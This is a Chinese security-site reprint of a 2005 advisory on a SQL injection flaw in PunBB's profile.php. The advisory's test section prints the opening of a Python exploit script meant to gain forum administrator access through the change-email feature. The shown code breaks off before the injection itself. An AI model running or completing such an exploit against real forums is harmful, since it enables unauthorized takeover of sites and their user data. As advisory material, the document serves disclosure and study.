| PunBB profile.php远程SQL注入漏洞 |
|
| PunBB profile.php远程SQL注入漏洞 |
|
| |
|
受影响系统: PunBB PunBB 1.2.4 PunBB PunBB 1.2.3 PunBB PunBB 1.2.2 PunBB PunBB 1.2.1 PunBB PunBB 1.1.5 PunBB PunBB 1.1.4 PunBB PunBB 1.1.3 PunBB PunBB 1.1.2 PunBB PunBB 1.1.1 PunBB PunBB 1.1 PunBB PunBB 1.0.1 PunBB PunBB 1.0 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 13071
PunBB是一款基于PHP的论坛程序。
PunBB中存在SQL注入漏洞,远程攻击者可能非法获取数据库的访问。
起因是在SQL查询中使用用户提供的输入前没有正确的通过profile.php脚本检查用户输入。攻击者可以利用这个漏洞获取对有漏洞论坛的管理访问。
<*来源:exploits@nopiracy.de (exploits@nopiracy.de)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111306207306155&w=2 *>
测试方法: --------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
import urllib import getopt import sys import string
__argv__ = sys.argv
def banner(): print "PunBB 1.2.4 - change_email SQL injection exploit" print "Copyright (C) 2005 Hardened-PHP Project\n"
def usage(): banner() print "Usage:\n" print " $ ./punbb_change_email.py [options]\n" print " -h http_url url of the punBB forum to exploit" print " f.e. http://www.forum.net/punBB/" print " -u username punBB forum useraccount" print " -p password punBB forum userpassword" print " -e email email address where the admin leve activation email \ is sent" print " -d domain catch all domain to catch \ \"some-SQL-Query\"@domain emails" print "" sys.exit(-1)
def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") except getopt.GetoptError: usage()
if len(__argv__) < 10: usage()
username = None password = None email = None domain = None host = None for o, arg in opts: if o == "-h": host = arg if o == "-u": username = arg if o == "-p": password = arg if o == "-e": email = arg if o == "-d": domain = arg
# Printout banner banner()
# Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) if username == None: print "[-] username needed to continue" sys.exit(-1) if password == None: print "[-] password needed to continue" sys.exit(-1) if email == None: print "[-] email address needed to continue" sys.exit(-1) if domain == None:
|
 |
频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。
| 原始作者:佚名 |
录入时间:2006-11-3 |
| 信息来源:不详 |
投稿信箱:itqoo@126.com |
|
|
 |
|
|
| 教程录入:admin 责任编辑:admin |
|
上一个教程: NEXTWEB (i)Site多个安全漏洞
下一个教程: phpBB up.php任意文件上传漏洞 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |